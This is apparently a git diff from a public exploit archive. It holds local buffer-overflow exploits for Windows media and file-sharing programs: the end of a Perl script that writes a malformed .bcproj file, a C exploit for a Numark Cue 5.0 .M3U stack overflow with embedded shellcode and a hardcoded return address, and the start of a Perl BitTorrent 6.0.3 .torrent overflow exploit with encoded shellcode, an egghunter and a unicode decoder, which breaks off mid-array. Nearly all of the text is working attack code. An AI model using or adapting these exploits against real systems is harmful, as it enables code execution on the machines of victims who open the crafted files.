+	"\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
+	"\x00\x00\xD8\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00".
+	"\x07\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F".
+	"\x00\x00\x00\x00\x00\x00\xDC\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00".
+	"\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00".
+	"\x00\x00\x00\x00\x08\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE0\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65".
+	"\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x02\x00\x00\x00\x01\x00\x00\x00\x09\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE2\x3F\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x0A\x00\x00\x00\x64\x00\x00\x00".
+	"\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE4\x3F".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x0B\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
+	"\x00\x00\xE6\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00".
+	"\x0C\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F".
+	"\x00\x00\x00\x00\x00\x00\xE8\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00".
+	"\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00".
+	"\x01\x00\x00\x00\x0D\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEA\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65".
+	"\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x03\x00\x00\x00\x02\x00\x00\x00\x0E\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEC\x3F\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x0F\x00\x00\x00\x64\x00\x00\x00".
+	"\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEE\x3F".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x62\x73\x65\x71\x24\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x01\x00\x00\x00\x62\x73\x71\x6F\x38\x00\x00\x00\x00\x00\x80\x3F".
+	"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x71\x6F\x38\x00\x00\x00".
+	"\x00\x00\x80\x3F\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x65\x71".
+	"\x08\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00";
+
+
+open (MYFILE, '>>POC.bcproj');
+binmode(MYFILE);
+print MYFILE "$tuff";
+close (MYFILE);
+print "Exploit file has been created. ( POC.bcproj )\n";
+
+# milw0rm.com [2008-08-30]
diff --git a/platforms/windows/local/6389.cpp b/platforms/windows/local/6389.cpp
index a0e387233..fa56878a9 100755
--- a/platforms/windows/local/6389.cpp
+++ b/platforms/windows/local/6389.cpp
@@ -1,113 +1,113 @@
-/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow
- This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption.
- Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2.
- 
- After preparation:
- |Access violation when executing [58414158]|  
-EAX 00000001
-ECX 004C01B2 cue_tria.004C01B2
-EDX 01030608
-EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13. DMX - Life be my Song.mp3.jpg"
-EBP 00000000
-ESI 016016E0
-EDI 00000000
-EIP 58414158
-Geetz to my friends Gil-Dong,Marsu,Expanders,Str0ke,Razvan,Vlad and all the people that I 
- know...find me in Regie.
-*/
-
-#include
-#include
-#include
-#include
-
-#define OFFSET 549
-
-//got this shellcode from metasploit
-  char shellcode[]=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
-"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
-"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
-"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
-"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
-"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
-"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
-"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
-"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
-"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
-"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
-"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
-"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
-"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
-"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
-"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
-"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
-"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
-"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
-"\x70\x63";
-
-
-  char file_start[]=
-"\x23\x56\x69\x72\x74\x75\x61\x6C\x44\x4A"
-"\x20\x50\x6C\x61\x79\x6C\x69\x73\x74\x0D"
-"\x0A\x23\x4D\x69\x78\x54\x79\x70\x65\x3D"
-"\x53\x6D\x61\x72\x74\x0D\x0A\x49\x3A\x5C";
-
-
-  char file_end[]=
-"\x72\x20\x4F\x66\x20\x54\x68\x65\x20\x44"
-"\x6F\x67\x20\x41\x67\x61\x69\x6E\x20\x28"
-"\x32\x30\x30\x36\x29\x5B\x54\x2D\x42\x6F"
-"\x79\x7A\x5D\x5C\x31\x33\x2E\x20\x44\x4D"
-"\x58\x20\x2D\x20\x4C\x69\x66\x65\x20\x62"
-"\x65\x20\x6D\x79\x20\x53\x6F\x6E\x67\x2E"
-"\x6D\x70\x33\x0D\x0A\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00";
-
- int main(int argc, char *argv[])
- { FILE *y;
-   unsigned char *buffer;
-   unsigned int offset=0;
-   unsigned int NEW_EIP=0x7C8369F0;
-   
-    if(argc<2) 
-   {   
-    printf("****************************************\n");
-    printf("USAGE IS:");
-             printf("FileName.m3u\n");  
-    printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
-    printf("****************************************\n");    
-    system("color 02");
-    Sleep(2000); 
-return 0;   
-   }  
-   
-   if((y=fopen(argv[1],"wb"))==NULL)
-   { printf("error"); 
-     exit(0); 
-   } 
-   
-   printf("************************************************************\n");
-   printf("Numark Cue 5.0 rev 2 .M3U File Stack Buffer Overflow\n");
-   printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
-   printf("File successfully buit,open with Numark Cue :)\n");
-   printf("************************************************************\n"); 
-   system("color 03");
-   
-   buffer=(unsigned char *)malloc(OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15);
-   memset(buffer,0x90,OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15);
-   memcpy(buffer,file_start,strlen(file_start));  offset=OFFSET;  
-   memcpy(buffer+offset,&NEW_EIP,4);  offset+=4;
-   offset+=15;
-   memcpy(buffer+offset,shellcode,strlen(shellcode)); offset+=strlen(shellcode);
-   memcpy(buffer+offset,file_end,strlen(file_end)); offset+=strlen(file_end);
-   fprintf(y,"%s",buffer);
-   
-return 0;  
-      }
-
-// milw0rm.com [2008-09-06]
+/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow
+ This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption.
+ Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2.
+ 
+ After preparation:
+ |Access violation when executing [58414158]|  
+EAX 00000001
+ECX 004C01B2 cue_tria.004C01B2
+EDX 01030608
+EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13. DMX - Life be my Song.mp3.jpg"
+EBP 00000000
+ESI 016016E0
+EDI 00000000
+EIP 58414158
+Geetz to my friends Gil-Dong,Marsu,Expanders,Str0ke,Razvan,Vlad and all the people that I 
+ know...find me in Regie.
+*/
+
+#include
+#include
+#include
+#include
+
+#define OFFSET 549
+
+//got this shellcode from metasploit
+  char shellcode[]=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
+"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
+"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
+"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
+"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
+"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
+"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
+"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
+"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
+"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
+"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
+"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
+"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
+"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
+"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
+"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
+"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
+"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
+"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
+"\x70\x63";
+
+
+  char file_start[]=
+"\x23\x56\x69\x72\x74\x75\x61\x6C\x44\x4A"
+"\x20\x50\x6C\x61\x79\x6C\x69\x73\x74\x0D"
+"\x0A\x23\x4D\x69\x78\x54\x79\x70\x65\x3D"
+"\x53\x6D\x61\x72\x74\x0D\x0A\x49\x3A\x5C";
+
+
+  char file_end[]=
+"\x72\x20\x4F\x66\x20\x54\x68\x65\x20\x44"
+"\x6F\x67\x20\x41\x67\x61\x69\x6E\x20\x28"
+"\x32\x30\x30\x36\x29\x5B\x54\x2D\x42\x6F"
+"\x79\x7A\x5D\x5C\x31\x33\x2E\x20\x44\x4D"
+"\x58\x20\x2D\x20\x4C\x69\x66\x65\x20\x62"
+"\x65\x20\x6D\x79\x20\x53\x6F\x6E\x67\x2E"
+"\x6D\x70\x33\x0D\x0A\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00";
+
+ int main(int argc, char *argv[])
+ { FILE *y;
+   unsigned char *buffer;
+   unsigned int offset=0;
+   unsigned int NEW_EIP=0x7C8369F0;
+   
+    if(argc<2) 
+   {   
+    printf("****************************************\n");
+    printf("USAGE IS:");
+             printf("FileName.m3u\n");  
+    printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
+    printf("****************************************\n");    
+    system("color 02");
+    Sleep(2000); 
+return 0;   
+   }  
+   
+   if((y=fopen(argv[1],"wb"))==NULL)
+   { printf("error"); 
+     exit(0); 
+   } 
+   
+   printf("************************************************************\n");
+   printf("Numark Cue 5.0 rev 2 .M3U File Stack Buffer Overflow\n");
+   printf("Credits for finding the bug and sploit go to fl0 fl0w \n");
+   printf("File successfully buit,open with Numark Cue :)\n");
+   printf("************************************************************\n"); 
+   system("color 03");
+   
+   buffer=(unsigned char *)malloc(OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15);
+   memset(buffer,0x90,OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15);
+   memcpy(buffer,file_start,strlen(file_start));  offset=OFFSET;  
+   memcpy(buffer+offset,&NEW_EIP,4);  offset+=4;
+   offset+=15;
+   memcpy(buffer+offset,shellcode,strlen(shellcode)); offset+=strlen(shellcode);
+   memcpy(buffer+offset,file_end,strlen(file_end)); offset+=strlen(file_end);
+   fprintf(y,"%s",buffer);
+   
+return 0;  
+      }
+
+// milw0rm.com [2008-09-06]
diff --git a/platforms/windows/local/6787.pl b/platforms/windows/local/6787.pl
index a7d9ba424..d2a16ece1 100755
--- a/platforms/windows/local/6787.pl
+++ b/platforms/windows/local/6787.pl
@@ -1,176 +1,176 @@
-#!/usr/bin/perl
-# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
-# 09/21/2008 by  k`sOSe && oVeret
-
-use warnings;
-use strict;
-
-# If you change this(avoid \x80->\x9f unless you really know what you are doing) you must also change the length value of the decoder
-my $shellcode =  
-#  windows/exec CMD="C:\WINDOWS\system32\calc.exe"  
-#[*] x86/alpha_mixed succeeded, final size 337                                                                                  
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
-"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41" .
-"\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" .
-"\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x51" .
-"\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c" .
-"\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a\x4f\x4c\x4b\x50" .
-"\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51" .
-"\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49" .
-"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x43\x37\x49" .
-"\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" .
-"\x4b\x50\x54\x47\x54\x43\x34\x43\x45\x4d\x35\x4c\x4b\x51" .
-"\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50" .
-"\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45" .
-"\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45" .
-"\x54\x48\x43\x51\x4f\x46\x51\x4b\x46\x45\x30\x46\x36\x45" .
-"\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c" .
-"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4d" .
-"\x59\x4b\x48\x4d\x53\x49\x50\x42\x4a\x50\x50\x45\x38\x4a" .
-"\x50\x4c\x4a\x43\x34\x51\x4f\x45\x38\x4c\x58\x4b\x4e\x4c" .
-"\x4a\x44\x4e\x50\x57\x4b\x4f\x4a\x47\x50\x43\x46\x5a\x51" .
-"\x4c\x46\x37\x50\x49\x50\x4e\x51\x54\x50\x4f\x50\x57\x50" .
-"\x53\x51\x4c\x42\x53\x43\x49\x44\x33\x44\x34\x45\x35\x42" .
-"\x4d\x50\x33\x46\x52\x51\x4c\x42\x43\x43\x51\x42\x4c\x45" .
-"\x33\x46\x4e\x43\x55\x42\x58\x42\x45\x43\x30\x44\x4a\x41" .
-"\x41";
-
-$shellcode .= "\x87\x87"; # -> \x21\x20\x21\x20 -> EGG ( for english windows version )
-
-my $ret	= "\x3f\x41"; # -> unicode friendly pop,pop,ret
-
-# unicode friendly get_EIP (needed by the venetian decoder)
-sub get_eip
-{
-	#0041 00          ADD BYTE PTR DS:[ECX],AL
-	#5F               POP EDI
-	#0041 00          ADD BYTE PTR DS:[ECX],AL
-	#5F               POP EDI
-	#0041 00          ADD BYTE PTR DS:[ECX],AL
-	#6A 00            PUSH 0
-	#58               POP EAX
-	#0041 00          ADD BYTE PTR DS:[ECX],AL
-	#57               PUSH EDI
-	#0041 00          ADD BYTE PTR DS:[ECX],AL
-	#54               PUSH ESP
-	#0041 00          ADD BYTE PTR DS:[ECX],AL
-	#5A               POP EDX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#40               INC EAX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#43               INC EBX
-	#0042 00          ADD BYTE PTR DS:[EDX],AL
-	#58               POP EAX
-	#0041 00          ADD BYTE PTR DS:[ECX],AL
-	"\x5f\x41\x5f\x41\x6a\x58\x41\x57\x41\x54\x41\x5a" . "\x42\x40" x 12 . "\x42\x43" . "\x42\x58\x41";
-}
-
-
-sub egghunter
-{
-	#6A01		PUSH 1
-	#5E		POP ESI
-	#4E		DEC ESI (=0)
-	#6A72		PUSH 72				<- starts from 0x00720000
-	#56		PUSH ESI
-	#4C		DEC ESP
-	#4C		DEC ESP
-	#5E		POP ESI
-	#5E		POP ESI				<- ESI == 0x00720000
-	#BA21202120	/MOV EDX,20212021		<- egg
-	#46		|INC ESI
-	#3B16		|CMP EDX,DWORD PTR DS:[ESI]
-	#75FB		\JNZ SHORT egghunter
-	"\x6A\x01\x5E\x4E\x6A\x72\x56\x4C\x4C\x5E\x5E\xBA\x21\x20\x21\x20\x46\x3B\x16\x75\xFB";
-}
-
-# this will decode the unicode expanded shellcode pushing it to the stack and the execute it
-sub decoder
-{
-	#46		INC ESI
-	#6A01		PUSH 1
-	#6801010155	PUSH 0x55010101
-	#4C		DEC ESP
-	#5B		POP EBX
-	#5B		POP EBX
-	#AD		/LODS DWORD PTR DS:[ESI]
-	#50		|PUSH EAX
-	#44		|INC ESP
-	#44		|INC ESP
-	#44		|INC ESP
-	#4E		|DEC ESI
-	#4E		|DEC ESI
-	#4E		|DEC ESI
-	#4E		|DEC ESI
-	#4E		|DEC ESI
-	#4E		|DEC ESI
-	#4B		|DEC EBX
-	#83FB01		|CMP EBX,1
-	#75EF		\JNE SHORT decoder
-	#54		PUSH ESP
-	#59		POP ECX
-	#4C		DEC ESP		-> realign
-	#51		PUSH ECX
-	#C3		RET
-"\x46\x6A\x01\x68\x01\x01\x01\x55\x4C\x5B\x5B\xAD\x50\x44\x44\x44\x4E\x4E\x4E\x4E\x4E\x4E\x4B\x83\xFB\x01\x75\xEF\x54\x59\x4c\x51\xc3";
-}
-
-# venetian deccoder + venetian encoded egghunter and decoder
-sub venetian_decoder
-{
-"\x05\x03\x01\x71\x2D\x01\x01\x71\x40\x71\xC6\x01\x71\x40\x71\x40".
-"\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x72\x71\x40\x71\x40\x71\xC6".
-"\x4C\x71\x40\x71\x40\x71\xC6\x5E\x71\x40\x71\x40\x71\xC6\xBA\x71".
-"\x40\x71\x40\x71\xC6\x20\x71\x40\x71\x40\x71\xC6\x20\x71\x40\x71".
-"\x40\x71\xC6\x3B\x71\x40\x71\x40\x71\xC6\x75\x71\x40\x71\x40\x71".
-"\xC6\x46\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x01".
-"\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x4C\x71\x40".
-"\x71\x40\x71\xC6\x5B\x71\x40\x71\x40\x71\xC6\x50\x71\x40\x71\x40".
-"\x71\xC6\x44\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6".
-"\x4E\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x4B\x71".
-"\x40\x71\xFE\xFE\x40\x71\xC6\xFB\x71\x40\x71\x40\x71\xC6\x75\x71".
-"\x40\x71\x40\x71\xC6\x54\x71\x40\x71\x40\x71\xC6\x4C\x71\x40\x71".
-"\x40\x71\xC6\xC3\x71\x40\x71\x04\x04\x04\x04\x04\x04\x04\x04\x04".
-"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
-"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
